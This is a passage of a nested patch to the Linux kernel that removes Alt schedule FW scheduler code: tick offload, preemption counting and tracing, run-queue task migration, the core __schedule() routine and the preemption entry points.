-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+	int os;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	/* There cannot be competing actions, but don't rely on stop-machine. */
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
-+	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
-+	/* Don't cancel, as this would mess up the state machine. */
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
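-+
-+/*
-+ * Why the "preempt_count() == val" tests above work (sketch):
-+ *
-+ *	preempt_disable();	// count 0 -> 1, == val(1): timing starts
-+ *	preempt_disable();	// count 1 -> 2: nested, ignored
-+ *	preempt_enable();	// count still 2 at the check: ignored
-+ *	preempt_enable();	// count 1 == val(1) at the check: timing stops
-+ */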
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired, since
-+ * there's no point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
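-+
-+/*
-+ * On !PREEMPT_RT, SM_MASK_PREEMPT is ~0U, so the test in __schedule()
-+ * below,
-+ *
-+ *	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state)
-+ *
-+ * reduces to "if (!sched_mode && prev_state)" -- the plain zero check
-+ * the comment above refers to.
-+ */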
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outmost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* bypass the sched_feat(HRTICK) check, which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev_state & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (have scheduled out non-voluntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (schedule out non-voluntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disable() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used someplace that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return..
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note that this is called and returns with irqs disabled. This will
-+ * protect us against recursive calling from irq context.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
